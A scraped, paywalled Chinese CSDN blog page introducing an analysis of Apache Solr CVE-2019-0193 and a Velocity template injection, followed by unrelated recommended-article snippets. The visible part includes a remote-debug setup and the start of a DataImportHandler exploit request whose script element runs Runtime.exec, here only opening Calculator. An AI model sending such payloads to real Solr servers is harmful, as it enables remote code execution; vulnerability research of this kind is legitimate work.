solr 配置多个entity_详细分析Solr的CVE20190193以及velocity模板注入新洞

最新推荐文章于 2023-02-01 23:26:24 发布
VIP文章 最新推荐文章于 2023-02-01 23:26:24 发布
阅读量167 收藏
点赞数
文章标签: solr 配置多个entity
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39804523/article/details/111578490
版权

环境搭建

java "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9000" -Dsolr.solr.home="../example/example-DIH/solr/" -jar start.jar --module=http

然后idea加远程调试9000端口,dist、server/lib文件夹加到library里。dist是solr的主要jar

首先是CVE-2019-0193

首先看exp

POST /solr/tika/dataimport HTTP/1.1

Host: 10.27.52.42:8983

Content-Length: 416

Content-type: application/x-www-form-urlencoded

Connection: close

command=full-import&dataConfig=

<dataConfig>

<dataSource type="URLDataSource"/>

<script>CDATA[ java.lang.Runtime.getRuntime().exec("open -a Calculator");

]]>script>

<document>

<entity name="a"

最低0.47元/天 解锁文章
weixin_39804523
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
solr 配置多个entity_solr使用总结
weixin_39670545的博客
12-18 565
1 solr概述Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。它通过使用类似REST的HTTP API,这就确保你能从几乎任何编程语言来使用solr。2 solr安装下载安装jdk,需要1.8及以上版本,并设置JAVA_HOME下载solr安装包:https://lucene.apache.org/solr/到官网点击Download下载下载完成后会得到一个压缩包,解压...
MongoDB基本操作命令
whjhut的博客
07-02 315
MongoDB基本操作命令 工具:RoboMongoDB 1.0 特别说明:本文并非作者原创,文中内容来自于《NoSQL数据库原理与应用》(王爱国,许桂秋主编)书中的第五章!!! 一、MongoDB操作命令 1、use test //创建数据库,如果已经存在直接连接 (注意:对某个数据库操作之前,一定要用use切换至该数据库,否则出错) 2、show dbs //查看当前数据库列表 3、db.dropDatabase() //删除当前数据库 4、db.getCollectionNames()
惊呆了!Spring Boot 还能远程调试?
架构师小秘圈
07-20 483
目录前言什么是远程调试?为什么要远程调试?什么是JPDA?如何开启远程调试?transportserversuspendaddressonthrowonuncaughtlaunchtime...
Java之远程Debug
pard的专栏
04-20 2164
背景知识 Java提供了一个方便调试协议,名为JDWP(Java Debug Wire Protocol),是一个用于连接调试器和目标程序的协议。JVM自带该协议,我们可以通过命令查看 java -agentlib:jdwp=help 我们会在启动调试程序的Java命令行参数中使用JDWP,使用方式如下 java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 OurApplication 调试器(debugger):指
完整开启JVM远程调试
rightkk的博客
02-01 2794
参数说明:-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=transport:指定了调试数据的传送方式,dt_socket是指用SOCKET模式,另有dt_shmem指用共享内存方式,其中,dt_shmem只适用于Windows平台;address:调试服务器的端口号,客户端用来连接服务器的端口号;server=y/n:当前JVM实例是否需要作为调试服务器执行,填y;
SolrDocument与实体类转换
ldcn的博客
10-10 3741
/** * * SolrDocument与实体类转换 * * @param document * SolrDocument对象 * @param clzz * 泛型类 * @return */ public
ikanalyzer-solr8.4.0_solr8_solr_ikanalyzer_中文分词_
10-02
此为solr8的ikanalyzer中文分词包
apache-solr-1.4.0.zip_apache-solr _apache-solr-1.4.0_apache-solr
09-20
solr1.4源码(欢迎喜欢研究solr的人下载)
solr_solr_lucene_
09-29
Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。同时对其进行了扩展,提供了比Lucene更为丰富的查询语言,同时实现了可配置、可扩展并对查询性能进行了优化,并且提供了一个完善的功能管理界面,是一...
es与solr的区别_solr_ES_es与solr的区别_elasticsearch_
10-03
详细介绍了Elasticsearch 和 solr 的区别;是一道经典的java面试题
hive-solr-master.zip_hive_solr_solr-hive
09-24
hive与SOLR更新插件, 实现HIVE数据与SOLR的同步
solr基础理解和功能分析
qq_41585300的博客
03-29 5788
一、solr概述 Solr是一个开源搜索平台,用于构建搜索应用程序。 它建立在Lucene(全文搜索引擎)之上。Solr是一个可扩展的,可部署,搜索/存储引擎,优化搜索大量以文本为中心的数据。 二、solr管理界面功能 1.Logging 展示Solr的日志,不用去后台查日志,还可以用来配置打印日志级别。 2.Core Admin 支持SolrCore的基本操作。 主要有 Add Core(添加核心), Unload(卸载核心),Rename(重命名核心),Reload(重 新加载核心),Opt
solr 连接mysql库 自动更新索引
wz1989love的专栏
06-01 423
上期我们探讨了solr的入门,以及使用solr可视化界面进行索引操作的流程,可视化界面上对索引的操作其实就是通过接口,但是日常项目应用中不会一条条的通过接口插入索引。这期我们来探讨下solr连接mysql数据库,通过配置文件来实现批量导入索引,导入索引以后通过solr自带的定时任务自动更新索引。 数据准备 新建数据库表 在mysql库中新建一个student表做为solr数据来源,除了正常的数据字段以外,还需要有2个特殊字段,用来做为solr自动更新索引时的标识使用。 isdelete 逻辑删除字段,默
Jvm运维
xiaoxishuaidaile的博客
12-10 624
1、远程debug -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=1044 suspend:是不是等远程连接来了才开始启动进程 address:端口号 2、jstack线程分析thread dump日志文件分析_旧路-CSDN博客_dump日志分析 jstack pid >a :获取栈信息输出到a java -jar jcaxx.jar。在软件里打开a,就可以看到线程栈的情况 3、飞行数据jvm运行时保留相关..
solr建索引优化
08-18 296
这是我 2016 年写的文章,发出来,做索引优化的朋友都可以参考下。名词解释Lucene:高性能的全文检索开源的 Java 工具包。Solr :高性能的利用 java 开发的、开源的,基...
java远程调试
qyaxx的博客
11-02 7953
Java远程调试配置说明 Java远程调试是指在本地连接远程的服务器java服务进行调试,便于利用线上环境,无需在本地进行环境搭建,数据准备,重现问题,直接进行代码调试问题排查。Java远程调试配置总体上分两步: java服务器配置 本地调试配置 服务器配置 需要在服务器服务启动文件中增加如下启动参数 -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 其中address=5005是指端口5005,可以自行指定,su
solr快速入门
weixin_42513762的博客
10-27 1213
文章内容输出来源:拉勾教育Java高薪训练营 一.Solr基础回顾 1.什么是solr 为了在CNET 公司网站上添加搜索功能,Yonik Seely于2004年创建了Solr。并在2006年1月,它成为 Apache软件基金会下的一个开源项目。并于2016年发布新版本Solr 6.0,支持并行SQL查询的执行,目 前最新的版本是8.6.0。 Solr是一个开源搜索平台,用于构建搜索应用程序。 它建立在Lucene(全文搜索库)之上。Solr不仅限于 搜索,也可以用于存储目的。像其他NoSQL数据库一样,
solr 配置多个entity_「技术选型」Solr大战ES,且看第7回到18回
weixin_39607447的博客
12-18 126
比较Solr和Elasticsearch:主要区别是什么?两个搜索引擎都在迅速发展,因此,无需多说,以下是关于Elasticsearch和Solr之间差异的最新信息:7. 切分位置一般来说,就建立索引和碎片的位置而言,Elasticsearch是非常动态的。当某个动作发生时,它可以在集群周围移动碎片——例如,当一个新节点加入或从集群中删除一个节点时。我们可以通过使用感知标签来控制碎片应该放在哪里和...
solr 配置多个entity_solr安装
weixin_39853131的博客
12-18 152
一. solr的环境: java8的安装 solr基于java, solr 8 以上的版本 需要java8的支持二. solr的安装和启动step 1: 获取下载包镜像云 搜 apache -> lucene -> solrhttps://mirrors.huaweicloud.com/apache/lucene/solr/8.6.1/solr-8.6.1.tgzstep2: 下载cd...
solr-data-config.xml entity的详细配置方法
最新发布
06-08
下面是一个示例 entity配置: ```xml <entity name="product" pk="id" query="SELECT id, name, description, price FROM products" transformer="script:transformProduct.js"> </entity> ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值